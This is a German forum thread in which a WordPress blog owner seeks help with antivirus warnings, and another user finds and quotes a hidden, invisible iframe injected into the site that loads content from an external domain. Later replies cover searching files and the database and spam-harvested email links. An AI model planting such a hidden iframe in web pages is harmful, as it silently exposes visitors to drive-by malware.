Wordpress-Blog: etwaiges Schadsoftware-Problem

    • Wordpress-Blog: etwaiges Schadsoftware-Problem

      Liebste ZFB-Gemeinde,

      da sich hier technisches Know-How mit Freundlichkeit findet, dachte ich, vielleicht kann mir hier ja jemand helfen. :)

      Ich führe (mit einem Freund zusammen) ein Blog ( schmalspurgranaten de ), wie so viele andere auch, den wir mit Wordpress betreiben. Vor vier Wochen oder so sagte nun mal ein Antivirenprogramm (AVG) bei jenem Freund, dass unsere Seite mit Schadsoftware infiziert sei oder zumindest gefährdet wäre. Bei mir kam nix, ich habe daraufhin ein paar Webseiten-Scanner bemüht, ob eine objektive Gefahr besteht. Wie ich das anderweitig überprüfen kann, weiß ich nämlich leider nicht so richtig. Unter urlvoid.com kann man ja die Reputation seiner Seite überprüfen und vor allem mit neun verschiedenen Antiviren-Engines (darunter auch AVG) seine Seite scannen. Das habe ich gemacht und als Antwort kam heraus, dass unsere Seite clean sei. Jetzt weiß ich nur nicht, inwiefern ich dem trauen kann.
      Ich benutze an meinen Computern (also Desktop-PC und Netbook) ZoneAlarm und Antivir (ist vielleicht auch nicht as Wahre?), und ZoneAlarm sagt beim Besuch unserer Webseite bei beiden Systemen, dass java.exe auf den Computer zugreifen will. Mir sind in (unserem) Wordpress aber keine java-Elemente bewusst, deshalb kommt mir das nicht ganz koscher vor.

      -> Frage: Wie kann ich meine Wordpress-Website auf java-Schadstoff-Elemente überprüfen und ggf entfernen?
      Denn die letzten Backups dürften dann ja, so denn eine Gefahr vorhanden ist, auch infiziert sein, oder?

      Für jedwede Hilfe bin ich dankbar. (:

      beste,
      p.
      I wasn't playing baseball, no!
      I wasn't playing football, no!
      I wasn't playing basketball, noo!
      I was playing Class War!

    • Ich bin zwar auch nicht so bewandert in der Sache, aber ich hab die Seite trotzdem mal durchgeguckt.
      Im Code selbst habe ich so spontan nichts gefunden, was jedoch nicht heißt, dass dort nichts ist.

      Was mir jedoch zu denken gibt ist, dass nachdem ich die Seite aufgerufen habe, hat mein Norton scheinbar einem Trojaner den Arsch versohlt. Das Teil selbst kam allerdings von ner anderen URL. Ich häng mal nen Screenshot vom Bericht an und krabbel nochmal durch deinen Quellcode, soweit Firebug es zulässt.
      Hab ja grad eh nix besseres zu tun, da kann ich mich ja mal nützlich machen. :ugly:


      Ah..... da ist doch was...
      Was mich mal interessieren würde, da ich mit Wordpress noch nie gearbeitet habe:
      In wie weit hast du Zugriff auf den Quellcode (für direkte Änderungen, etc.) und auf wessen Server liegt das ganze Ding überhaupt?
      Folgender iframe kommt mir persönlich sehr komisch vor:

      <iframe width="10" height="10" src="http://korsa.in/z/11" style="visibility: hidden; position: absolute; left: 0pt; top: 0pt;">
      <html>
      <head>
      <title>404 Not Found</title>
      </head>
      <body>
      <h1>Not Found</h1>
      <p>The requested URL /z/11 was not found on this server.</p>
      </body>
      </html>
      </iframe>

      Die Source deutet zumindest mal auf ne .in Domain hin, wie das, wo meine Malware herkam. (Indien o.O)

      Ich will hier jetzt keine Panikmache veranstalten, kann sein dass das alles nur Paranoia meinerseits ist. Ich finds nunmal fishy, da iframes gerne für sowas benutzt werden, zumal er auch noch "hidden" ist.

      Wenn du direkten Zugang auf den Code hast, lösch am Besten den iframe.
      Über dem Ding sind noch 2 Zeilen javaScript Code, die mir auch komisch vorkommen, aber die können auch ganz normal sein, keine Ahnung. Ich stalk mal ein paar andere Wordpress blogs und guck wies bei denen aussieht.


      ...So, eine Stichprobe aus fünf anderen blogs sagt mir, dass die zwei Scriptzeilen nicht ganz so normal scheinen.
      Es wäre schön wenn jemand meine Funde bestätigen könnte, bevor ich hier Dinge ins Rollen bringe, die ganz und gar unnötig sind.
      Mehr als Vermutungen auf dieser Basis zu äußern, kann ich leider nicht. Ich hoffe, ich konnte weiterhelfen. ;)
      Bilder

      • trojan.jpg

        87,74 kB, 745×540, 300 mal angesehen
      Still waiting for a Fate/Hollow Ataraxia translation.
      ETA: never

      Dieser Beitrag wurde bereits 6 mal editiert, zuletzt von phr43k ()

    • Hey, erst einmal vielen Dank! Ich bin zurzeit kaum zu Hause, deshalb habe ich noch nicht geantwortet und bin auch noch nicht zum ausführlichen Ausprobieren gekommen. Dazu werde ich jetzt erst im Laufe dieser Woche kommen.

      Das Problem zu beheben, scheint mir allgemein schwieriger zu sein, als ich dachte. Der Code, in dem das <iframe>-Zeugs zu sehen ist, generiert sich ja offenbar aus den php-Dateien von Wordpress und heißt im PHP dann entsprechend anders. Und ich habe keine Ahnung, wo und wonach ich da genau gucken sollte. Zugriff habe ich quasi auf alles, die Webseite liegt ja auch dem von mir angemieteten Server. Innerhalb des Wordpress-Dashboards kann ich den Quellcode wohl nicht beeinflussen, aber eben, wie gesagt, die Dateien, die den generieren. Aber deswegen ist das Rauslöschen irgendwie nicht so einfach, wenn auch nicht unmöglich.

      Ist auf jeden Fall schoma scheiße, dass da was ist, aber eben gut zu wissen. Hast du ne Ahnung, in welchen Dateien ich wonach suchen sollte? Ist auf jeden Fall n Anfang, ich hoffe, das lässt sich irgendwie lösen. Danke auf jeden Fall. :)
      I wasn't playing baseball, no!
      I wasn't playing football, no!
      I wasn't playing basketball, noo!
      I was playing Class War!

    • Du kannst alle benutzten Dateien entweder mit einem Editor, das Dateipfad-rekursive Suchfunktionen unterstützt, nach "iframe" durchsuchen oder die Suchfunktion deines Betriebssystems nutzen (wobei Windows nur nach manueller Anpassung spezielle Dateien wie .php durchsucht). Die gefundenen Bereiche kopierst du entweder hierher oder versuchst es selber zu bearbeiten. Falls sich nichts finden lässt, kann es auch sein, dass der Code, der generiert wird, auf der Datenbank selbst gespeichert ist. Hierfür sind eventuell SQL-Abfragen nötig, falls sich auf dem ersten Blick nichts finden lässt.

    • So, so langsam komme ich dazu, mich um diese Dinge endlich zu kümmern. Ich habe jetzt erstmal versucht, im Quellcode vom Browser (Firefox) nach dem iframe zu suchen, um mir das anzuschauen, ehe ich in den .php Dateien wühle. Ich habe aber nichts gefunden. kannst du mir sagen, phr43k, wo du den entdeckt hast? Ich bin, wie gesgat, absoluter Laie. D:

      Dann habe ich noch mal ein paar Online-Viren-Scanner um eine aktuelle Analyse bemüht, darunter urlvoid.com, onlinelinkscan.com, den AVG Online Virus Scanner sowie AVG Online Link Scanner, und herauskam - nichts. Interessant dabei ist, dass der AVG Online Virus Scanner vor einem Monat noch auf dringende Gefahr hinwies, während er nun sagt, dass die Seite clean sei. Zu gleichen Ergebnissen kommen auch die restlichen Seiten, überall grünes Licht. Außerdem meldet ZoneAlarm, wenn ich den Blog mit dem Browser betrete, keine Java-Anwendung mehr, die auf meinen Computer zugreifen will. Kann sich das Problem tatsächlich von selbst gelöst haben?

      Deshalb eine Bitte: phr43k (oder auch bei allen anderen), meldet sich nach einem Besuch dein Norton immer noch zu Wort? Oder bei jemand anderem? Ich will ja keine malware publizieren. Aber so, wie es gerade ausschaut, würde ich die Webseite jetzt einfach normal weiterbetreiben. Is' mir ja auch freilich am liebsten so. Hmmm...
      I wasn't playing baseball, no!
      I wasn't playing football, no!
      I wasn't playing basketball, noo!
      I was playing Class War!

    • Oh, das tut mir leid. ._.
      ich habe mal alle Firewalls ausgemacht und mein Antivirenprogramm deaktiviert, die Browser geschlossen und bin mit dem IE und Firefox noch mal also möglichst ungesichert draufgegangen, mir ist nichts Schlimmes in Form von sowas (Fake-Viren-Scanner, was auch immer) aufgefallen. Hm.
      I wasn't playing baseball, no!
      I wasn't playing football, no!
      I wasn't playing basketball, noo!
      I was playing Class War!

    • Besagter iframe ist nicht mehr im Code und Avira (Bezahl-Version) mit höhster Heuristik-Einstellung für Websites sowie vollem Programm beim Web-Filter ist ebenso nicht angesprungen. Avira besitzt das drittbeste aktuelle Antivirusprogramm. Antivir ist ein Produkt von Avira. Mit Avira ist man definitiv gut ausgestattet.

      Ich würde dir aber empfehlen, den "mailto"-Bereich zu entfernen, sonst wird deine Adresse sehr schnell zugespammt, da viele Spam-Bots danach Ausschau halten.
      Es gibt auch gute Kontaktformulare auf Wordpress. Verlinke lieber darauf oder ersetze das "@" mit "[at]", "(at)" oder " at ". Aber selbst die letzte Methode dürfte nicht mehr wirklich sicher sein.
      Oder man richtet eine Mail-Adresse ein, die man ohnehin nicht nutzen würde und später auch löschen kann.
      Es ist einfach schade, wenn eine "klare" E-Mailadresse zugespammt wird.